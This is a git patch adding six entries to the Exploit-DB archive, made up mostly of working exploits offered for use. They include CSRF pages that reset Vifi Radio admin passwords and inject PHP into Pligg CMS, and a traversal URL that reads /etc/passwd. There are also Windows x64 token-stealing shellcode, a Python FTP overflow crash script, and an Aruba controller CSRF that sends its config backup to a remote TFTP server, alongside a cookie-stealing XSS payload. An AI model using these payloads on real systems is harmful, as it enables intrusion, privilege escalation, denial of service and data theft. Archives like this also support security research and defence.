From 6dccd55e18d9817f3869c507df3273ca793b1a13 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Fri, 21 Aug 2015 05:02:09 +0000
Subject: [PATCH] DB: 2015-08-21

6 new exploits
---
 files.csv                           |  8 ++++-
 platforms/asp/webapps/37892.txt     | 51 ++++++++++++++++++++++++++
 platforms/linux/remote/37889.txt    |  7 ++++
 platforms/php/webapps/37894.html    | 56 +++++++++++++++++++++++++++++
 platforms/win64/shellcode/37895.asm | 56 +++++++++++++++++++++++++++++
 platforms/windows/dos/37893.py      | 41 +++++++++++++++++++++
 platforms/xml/webapps/37891.txt     | 33 +++++++++++++++++
 7 files changed, 251 insertions(+), 1 deletion(-)
 create mode 100755 platforms/asp/webapps/37892.txt
 create mode 100755 platforms/linux/remote/37889.txt
 create mode 100755 platforms/php/webapps/37894.html
 create mode 100755 platforms/win64/shellcode/37895.asm
 create mode 100755 platforms/windows/dos/37893.py
 create mode 100755 platforms/xml/webapps/37891.txt

diff --git a/files.csv b/files.csv
index f102bde35..fac59f622 100755
--- a/files.csv
+++ b/files.csv
@@ -10740,7 +10740,7 @@ id,file,description,date,author,platform,type,port
 11739,platforms/php/webapps/11739.txt,"PHP Classifieds 7.5 - Blind SQL Injection Vulnerability",2010-03-15,ITSecTeam,php,webapps,0
 11740,platforms/php/webapps/11740.txt,"Ninja RSS Syndicator 1.0.8 - Local File Include",2010-03-15,jdc,php,webapps,0
 11741,platforms/php/webapps/11741.txt,"Phenix 3.5b - SQL Injection Vulnerability",2010-03-15,ITSecTeam,php,webapps,0
-11742,platforms/windows/remote/11742.rb,"(Gabriel's FTP Server) Open & Compact FTPd 1.2 Pre-Authentication Buffer Overflow (meta)",2010-03-15,blake,windows,remote,0
+11742,platforms/windows/remote/11742.rb,"(Gabriel's FTP Server) Open & Compact FTPd 1.2 - Pre-Authentication Buffer Overflow (meta)",2010-03-15,blake,windows,remote,0
 11743,platforms/php/webapps/11743.txt,"Joomla component com_rpx Ulti RPX 2.1.0 - Local File Include",2010-03-15,jdc,php,webapps,0
 11744,platforms/php/webapps/11744.txt,"Duhok Forum 1.0 script Cross-Site Scripting Vulnerability",2010-03-15,indoushka,php,webapps,0
 11745,platforms/php/webapps/11745.txt,"FreeHost 1.00 - Upload Vulnerability",2010-03-15,indoushka,php,webapps,0
@@ -34204,3 +34204,9 @@ id,file,description,date,author,platform,type,port
 37886,platforms/php/webapps/37886.txt,"up.time 7.5.0 XSS And CSRF Add Admin Exploit",2015-08-19,LiquidWorm,php,webapps,9999
 37887,platforms/php/webapps/37887.txt,"up.time 7.5.0 Arbitrary File Disclose And Delete Exploit",2015-08-19,LiquidWorm,php,webapps,9999
 37888,platforms/php/webapps/37888.txt,"up.time 7.5.0 Upload And Execute File Exploit",2015-08-19,LiquidWorm,php,webapps,9999
+37889,platforms/linux/remote/37889.txt,"YingZhiPython Directory Traversal and Arbitrary File Upload Vulnerabilities",2012-09-26,"Larry Cashdollar",linux,remote,0
+37891,platforms/xml/webapps/37891.txt,"Aruba Mobility Controller 6.4.2.8 - Multiple vulnerabilities",2015-08-20,"Itzik Chen",xml,webapps,4343
+37892,platforms/asp/webapps/37892.txt,"Vifi Radio v1 - CSRF Vulnerability",2015-08-20,KnocKout,asp,webapps,80
+37893,platforms/windows/dos/37893.py,"Valhala Honeypot 1.8 - Stack-Based Buffer Overflow",2015-08-20,"_ Un_N0n _",windows,dos,21
+37894,platforms/php/webapps/37894.html,"Pligg CMS 2.0.2 - Arbitrary Code Execution",2015-08-20,"Arash Khazaei",php,webapps,80
+37895,platforms/win64/shellcode/37895.asm,"Win2003 x64 - Token Stealing shellcode - 59 bytes",2015-08-20,"Fitzl Csaba",win64,shellcode,0
diff --git a/platforms/asp/webapps/37892.txt b/platforms/asp/webapps/37892.txt
new file mode 100755
index 000000000..f3b1d7ef0
--- /dev/null
+++ b/platforms/asp/webapps/37892.txt
@@ -0,0 +1,51 @@
+                .__        _____        _______                
+                |  |__    /  |  |___  __\   _  \_______   ____ 
+                |  |  \  /   |  |\  \/  /  /_\  \_  __ \_/ __ \
+                |   Y  \/    ^   />    <\  \_/   \  | \/\  ___/
+                |___|  /\____   |/__/\_ \\_____  /__|    \___  >
+                     \/      |__|      \/      \/            \/
+                         _____________________________ 
+                        /   _____/\_   _____/\_   ___ \
+                        \_____  \  |    __)_ /    \  \/   http://h4x0resec.blogspot.com
+                        /        \ |        \\     \____
+                       /_______  //_______  / \______  /
+                               \/         \/         \/         
+Vifi Radio v1 - CSRF (Arbitrary Change Password) Exploit
+~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+[+] Discovered by: KnocKout
+[~] Contact : knockout@e-mail.com.tr
+[~] HomePage : http://h4x0resec.blogspot.com / http://milw00rm.com
+[~] Greetz: BARCOD3, ZoRLu, b3mb4m, _UnDeRTaKeR_, DaiMon, VoLqaN, EthicalHacker,
+Oguz Dokumaci ( d4rkvisuaL ) Septemb0x, KedAns-Dz, indushka, Kalashinkov
+############################################################
+~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+|~Web App. : Vifi Radio
+|~Affected Version : v1
+|~Software : http://scriptim.org/market-item/vifi-v1-radyo-scripti/ & http://vifibilisim.com/scriptlerimiz-29-Radyo_Siteleri_Icin_Script.html 
+|~Official Demo :  http://radyo.vifibilisim.com
+|~RISK : Medium
+|~DORK : inurl:index.asp?radyo=2
+|~Tested On : [L] Windows 7, Mozilla Firefox
+########################################################
+----------------------------------------------------------
+                      PoC
+----------------------------------------------------------
+<html>
+  <body>
+    <form action="http://[TARGET]/yonetim/kullanici-kaydet.asp?tur=g" method="POST">
+      <input type="hidden" name="rutbe" value="1" />
+      <input type="hidden" name="djadi" value="0" />
+      <input type="hidden" name="resim" value="Vifi+Bili%FEim" />
+      <input type="hidden" name="firma" value="USERNAME" />
+      <input type="hidden" name="link" value="PASSWORD" />
+      <input type="hidden" name="sira" value="23" />
+      <input type="hidden" name="ilet" value="G%D6NDER" />
+      <input type="hidden" name="Submit" value="Exploit!" />
+	  <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>
+
+############################
+"Admin Panel: /yonetim "
+############################
\ No newline at end of file
diff --git a/platforms/linux/remote/37889.txt b/platforms/linux/remote/37889.txt
new file mode 100755
index 000000000..1ebb9bd1a
--- /dev/null
+++ b/platforms/linux/remote/37889.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/55685/info
+
+An attacker can exploit these issues to obtain sensitive information, to upload arbitrary code, and to run it in the context of the web server process.
+
+YingZhiPython 1.9 is vulnerable; other versions may also be affected. 
+
+ftp://www.example.com/../../../../../../../private/etc/passwd 
\ No newline at end of file
diff --git a/platforms/php/webapps/37894.html b/platforms/php/webapps/37894.html
new file mode 100755
index 000000000..238418566
--- /dev/null
+++ b/platforms/php/webapps/37894.html
@@ -0,0 +1,56 @@
+<!--
+# Exploit Title: Pligg CMS Arbitrary Code Execution
+# Google Dork: intext:"Made wtih Pligg CMS"
+# Date: 2015/8/20
+# Exploit Author: Arash Khazaei
+# Vendor Homepage: http://pligg.com
+# Software Link:
+https://github.com/Pligg/pligg-cms/releases/download/2.0.2/2.0.2.zip
+# Version: 2.0.2
+# Tested on: Kali , Iceweasel Browser
+# CVE : N/A
+# Contact : http://twitter.com/0xClay
+# Mail : 0xclay@gmail.com
+# Site : http://bhunter.ir
+
+# Description :
+
+# Pligg CMS Is A CMS Writed In PHP Language And Licensed Under GPL V 2.0
+# In Pligg CMS Panel In Adding Page Section Pligg CMS Allow To Admin Add
+PHP Codes In {php} {/php} Tags
+# A CSRF Vulnerabilty In Adding Page Section Allow To Attacker To Execute
+PHP Codes On Server .
+# In This Exploit I Just Added a echo '<h1> Hacked </h1>'; Code You Can
+Customize Exploit For Your Self .
+
+# Exploit :
+-->
+
+<html>
+<body onload="document.exploit.submit();">
+<form action="http://localhost/pligg-cms/admin/submit_page.php"
+method="POST" id="thisform" name="exploit">
+<input type="hidden" name="page_title" id="page_title"
+size="66"value="Hacked"/>
+<input type="hidden" name="page_url" id="page_url" size="66"
+value="Hacked"/>
+<input type="hidden" name="page_keywords" id="page_keywords" size="66"
+value="Hacked"/>
+<input type="hidden" name="page_description" id="page_description"
+size="66" value="Hacked"/>
+<textarea type="hidden"id="textarea-1" name="page_content"
+class="form-control page_content" rows="15"> {php}echo '<h1> Hacked </h1>';
+{/php} &lt;/textarea&gt;
+<input type="hidden" name="process" value="new_page" />
+<input type="hidden" name="randkey" value="12412532" />
+</form>
+</body>
+</html>
+
+<!--
+# After HTML File Executed You Can Access Page In
+http://localhost/pligg-cms/page.php?page=Hacked
+
+
+# Discovered By Arash Khazaei . (Aka JunkyBoy (Nick Name Changed :P ))
+-->
\ No newline at end of file
diff --git a/platforms/win64/shellcode/37895.asm b/platforms/win64/shellcode/37895.asm
new file mode 100755
index 000000000..da33c8664
--- /dev/null
+++ b/platforms/win64/shellcode/37895.asm
@@ -0,0 +1,56 @@
+;token stealing shellcode Win 2003 x64
+;based on the widely available x86 version
+;syntax for NASM
+;Author: Csaba Fitzl, @theevilbit
+
+;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
+;important structures and offsets;
+;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
+
+;kd> dt -r1 nt!_TEB
+;   +0x110 SystemReserved1  : [54] Ptr64 Void
+;??????+0x078 KTHREAD <----- NOT DOCUMENTED, can't get it from WINDBG directly
+
+;kd> dt -r1 nt!_KTHREAD
+;   +0x048 ApcState         : _KAPC_STATE
+;     +0x000 ApcListHead      : [2] _LIST_ENTRY
+;	  +0x020 Process          : Ptr64 _KPROCESS
+
+;kd> dt -r1 nt!_EPROCESS
+;   +0x0d8 UniqueProcessId  : Ptr64 Void
+;   +0x0e0 ActiveProcessLinks : _LIST_ENTRY
+;     +0x000 Flink            : Ptr64 _LIST_ENTRY
+;     +0x008 Blink            : Ptr64 _LIST_ENTRY
+;  +0x160 Token            : _EX_FAST_REF
+;     +0x000 Object           : Ptr64 Void
+;     +0x000 RefCnt           : Pos 0, 4 Bits
+;     +0x000 Value            : Uint8B
+
+BITS 64
+
+global start
+
+section .text
+
+start:
+mov 	rax, [gs:0x188] 	 	;Get current ETHREAD in
+mov 	rax, [rax+0x68]   		;Get current EPROCESS address
+mov 	rcx, rax                ;Copy current EPROCESS address to RCX
+
+find_system_process:
+mov 	rax, [rax+0xe0]   		;Next EPROCESS ActiveProcessLinks.Flink
+sub		rax, 0xe0				;Go to the beginning of the EPROCESS structure
+mov		r9 , [rax+0xd8]			;Copy PID to R9
+cmp 	r9 , 0x4    			;Compare R9 to SYSTEM PID (=4)
+jnz short find_system_process   ;If not SYSTEM got to next EPROCESS
+
+stealing:
+mov 	rdx, [rax+0x160] 		;Copy SYSTEM process token address to RDX
+mov 	[rcx+0x160], rdx		;Steal token with overwriting our current process's token address
+retn 	0x10
+
+;byte stream:
+;"\x65\x48\x8b\x04\x25\x88\x01\x00\x00\x48\x8b\x40\x68\x48\x89\xc1"
+;"\x48\x8b\x80\xe0\x00\x00\x00\x48\x2d\xe0\x00\x00\x00\x4c\x8b\x88"
+;"\xd8\x00\x00\x00\x49\x83\xf9\x04\x75\xe6\x48\x8b\x90\x60\x01\x00"
+;"\x00\x48\x89\x91\x60\x01\x00\x00\xc2\x10\x00"
\ No newline at end of file
diff --git a/platforms/windows/dos/37893.py b/platforms/windows/dos/37893.py
new file mode 100755
index 000000000..fc6d817e5
--- /dev/null
+++ b/platforms/windows/dos/37893.py
@@ -0,0 +1,41 @@
+"""
+********************************************************************************************
+# Exploit Title: Valhala Honeypot Stack based BOF(Remote DOS)
+# Date: 8/20/2015
+# Exploit Author: Un_N0n
+# Software Developer: Marcos Flavio Araujo Assuncao
+# Software Link: http://sourceforge.net/projects/valhalahoneypot/
+# Version: 1.8
+# Tested on: Windows 7 x86(32 BIT)
+********************************************************************************************
+
+[Steps to Produce the Crash]:
+1- Open 'honeypot.exe'.
+2- Enter the IP of the machine on which this honeypot is running, in this case it is your own
+   machine i.e 127.0.0.1.
+3- Run the script.
+~ Software crashes. 
+
+
+[Code to crash honeypot]: 
+==============================================================
+"""
+import socket
+
+while True:
+    s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+    s.connect(("IP_ADDR",21))
+    s.send('USER test\r\n')
+    s.send('PASS test\r\n')
+    s.send('ABOR '+'A'*2000+'\r\n')
+    s.recv(1024)
+    s.send('ABOR '+'A'*5000+'\r\n')
+    s.recv(1024)
+    s.send('ABOR '+'A'*6000+'\r\n')
+    s.recv(1024)
+    s.send('QUIT\r\n')
+    s.close()
+
+==============================================================
+
+**********************************************************************************************
\ No newline at end of file
diff --git a/platforms/xml/webapps/37891.txt b/platforms/xml/webapps/37891.txt
new file mode 100755
index 000000000..dfdd343bb
--- /dev/null
+++ b/platforms/xml/webapps/37891.txt
@@ -0,0 +1,33 @@
+# Title: Aruba Mobility Controller CSRF And XSS Vulnerabilities
+# Date: 08/016/2015
+# Author: Itzik Chen (itzik1 at gmail.com)
+# Product web page: http://www.arubanetworks.com
+# Affected Version: 6.4.2.8
+# Tested on: Aruba7240, Ver 6.2.4.8
+
+ 
+
+Summary
+================
+
+Aruba Networks is an HP company, one of the leaders in enterprise Wi-Fi.
+Arube Controller suffers from CSRF and XSS vulnerabilities.
+
+
+
+Proof of Concept - CSRF
+=========================
+
+192.168.0.1 - Controller IP-Address
+172.17.0.1 - Remote TFTP server 
+
+<IMG width=1 height=1 SRC="https://192.168.0.1:4343/screens/cmnutil/copyLocalFileToTftpServerWeb.xml?flashbackup.tar.gz,172.17.0.1,flashbackup.tar.gz">
+
+That will send the flashbackup configuration file to a remote TFTP server.
+
+
+
+Proof of Concept - XSS
+=========================
+
+https://192.168.0.1:4343/screens/switch/switch_mon.html?mode=plog-custom&mode-title=test</td><img width=1 height=1 src=/images/logo-mobility-controller.gif onLOAD=alert(document.cookie)>